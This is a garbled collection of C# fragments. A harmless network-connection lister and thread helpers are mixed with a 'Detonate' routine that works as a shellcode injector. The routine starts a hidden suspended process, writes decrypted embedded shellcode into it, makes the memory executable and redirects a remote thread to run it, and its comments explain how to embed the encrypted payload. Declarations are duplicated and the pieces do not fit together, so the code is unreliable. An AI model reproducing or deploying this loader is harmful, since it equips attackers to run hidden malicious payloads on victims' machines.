private int CreateThreadInternal(ThreadStartDelegate runFunc, IntPtr startData)
{
int threadID;
Thread thread;
lock (m_threads)
{
threadID = GenerateThreadID();
thread = new Thread(new ParameterizedThreadStart(start => runFunc((IntPtr)start)));
m_threads[threadID] = thread;
}
thread.Start(startData);
return(threadID);
}
/// <summary>
/// 线程方法
/// </summary>
private void ThreadStart()
{
var tcpCountInt = 0;
var udpCountInt = 0;
if (allCount.InvokeRequired || tcpCount.InvokeRequired || udpCount.InvokeRequired || pidInfoData.InvokeRequired)
{
ThreadStartDelegate delegateMe = ThreadStart;
pidInfoData.Invoke(delegateMe);
}
else
{
var tcpResult = NetProcessAPI.GetAllTcpConnections();
var udpResult = NetProcessAPI.GetAllUdpConnections();
foreach (var pid in tcpResult)
{
if (pid.owningPid > 0)
{
tcpCountInt++;
var pid_icon = ProcessAPI.GetIcon(pid.owningPid, true);
var pid_name = ProcessAPI.GetProcessNameByPID(pid.owningPid);
pidInfoData.Rows.Add(pid_icon, pid_name, pid.owningPid.ToString(), "TCP", pid.LocalAddress.ToString(), pid.LocalPort.ToString(), pid.RemoteAddress.ToString(), pid.RemotePort.ToString());
}
}
foreach (var pid in udpResult)
{
if (pid.owningPid > 0)
{
udpCountInt++;
var pid_icon = ProcessAPI.GetIcon(pid.owningPid, true);
var pid_name = ProcessAPI.GetProcessNameByPID(pid.owningPid);
pidInfoData.Rows.Add(pid_icon, pid_name, pid.owningPid.ToString(), "UDP", pid.LocalAddress.ToString(), pid.LocalPort.ToString(), "", "");
}
}
tcpCount.Text = tcpCountInt.ToString();
udpCount.Text = udpCountInt.ToString();
allCount.Text = (tcpCountInt + udpCountInt).ToString();
start_btn.Enabled = true;
}
}
static extern IntPtr CreateRemoteThread(
IntPtr hProcess,
IntPtr lpThreadAttributes,
uint dwStackSize,
ThreadStartDelegate lpStartAddress,
IntPtr lpParameter,
uint dwCreationFlags,
IntPtr lpThreadId);
static internal int CreateThread(IntPtr threadServiceHandle, ThreadStartDelegate runFunc, IntPtr startData)
{
var threadService = threadServiceHandle.NativeHandleToObject <ThreadService>();
return(threadService.CreateThreadInternal(runFunc, startData));
}
static void Detonate()
{
bool retValue;
string binPath = GetValidExecutable();
PROCESS_INFORMATION pInfo = new PROCESS_INFORMATION();
STARTUPINFO sInfo = new STARTUPINFO();
SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES();
pSec.nLength = Marshal.SizeOf(pSec);
tSec.nLength = Marshal.SizeOf(tSec);
const uint CREATE_SUSPENDED = 0x00000004;
const uint CREATE_NO_WINDOW = 0x08000000;
//MessageBox.Show("binPath: " + binPath);
retValue = CreateProcess(
binPath,
null,
ref pSec,
ref tSec,
false,
CREATE_NO_WINDOW | CREATE_SUSPENDED,
IntPtr.Zero,
null,
ref sInfo,
out pInfo);
// You NEED to add as a resource the encyrpted shellcode.
// You can do this by going to Project -> Properties -> Resources
// Then add a new file, then select the encrypted.bin (you'll need to
// ensure that all files are viewable to add, not just text).
// The, on the right side in solution explorer, click the encrypted.bin
// file and ensure the build action is set to "Embedded Resource".
uint rawDataLength = (uint)Runner.Properties.Resources.encrypted.Length;
IntPtr hProc = OpenProcess(ProcessAccessFlags.All, false, pInfo.dwProcessId);
//MessageBox.Show("Opened process.");
IntPtr pRemoteThread = VirtualAllocEx(
hProc,
IntPtr.Zero,
rawDataLength,
AllocationType.Commit | AllocationType.Reserve,
MemoryProtection.ReadWrite);
//MessageBox.Show("Allocated space");
Random rnd = new Random();
int SIZE_MOD = rnd.Next(100, 501);
int totalBytesWritten = 0;
//MessageBox.Show("Beginning deryption");
// All at once
byte[] decBytes = GetAllDecryptedBytes();
IntPtr bytesWritten = IntPtr.Zero;
WriteProcessMemory(hProc, pRemoteThread, decBytes, decBytes.Length, out bytesWritten);
IntPtr kernel32Addr = LoadLibrary("kernel32.dll");
IntPtr loadLibraryAddr = GetProcAddress(kernel32Addr, "LoadLibraryA");
if (loadLibraryAddr == null)
{
Console.WriteLine("Couldn't get proc address for kern32 loadlibraryaddr");
Environment.Exit(1);
}
//MessageBox.Show("Kernel 32 Addr loaded");
uint oldProtect = 0;
bool reportected = VirtualProtectEx(hProc, pRemoteThread, rawDataLength, MemoryProtection.ExecuteRead, out oldProtect);
if (reportected)
{
//MessageBox.Show("Was able to reportect");
ThreadStartDelegate funcdelegate = (ThreadStartDelegate)Marshal.GetDelegateForFunctionPointer(loadLibraryAddr, typeof(ThreadStartDelegate));
IntPtr hThread = CreateRemoteThread(hProc, IntPtr.Zero, 0, funcdelegate, IntPtr.Zero, 0x00000004, IntPtr.Zero);
if (hThread == null)
{
Console.WriteLine("Couldn't create remote thread");
Environment.Exit(1);
}
//MessageBox.Show("Created remote thread");
CONTEXT64 ctx = new CONTEXT64();
ctx.ContextFlags = CONTEXT_FLAGS.CONTEXT_CONTROL;
GetThreadContext(hThread, ref ctx);
ctx.Rip = (UInt64)pRemoteThread;
SetThreadContext(hThread, ref ctx);
ResumeThread(hThread);
CloseHandle(hThread);
//MessageBox.Show("done");
}
}
static extern IntPtr CreateRemoteThread(IntPtr hProcess,
IntPtr lpThreadAttributes, uint dwStackSize, ThreadStartDelegate
lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
static internal int CreateThread(ThreadStartDelegate runFunc, IntPtr startData)
{
return(ms_instance.CreateThreadInternal(runFunc, startData));
}
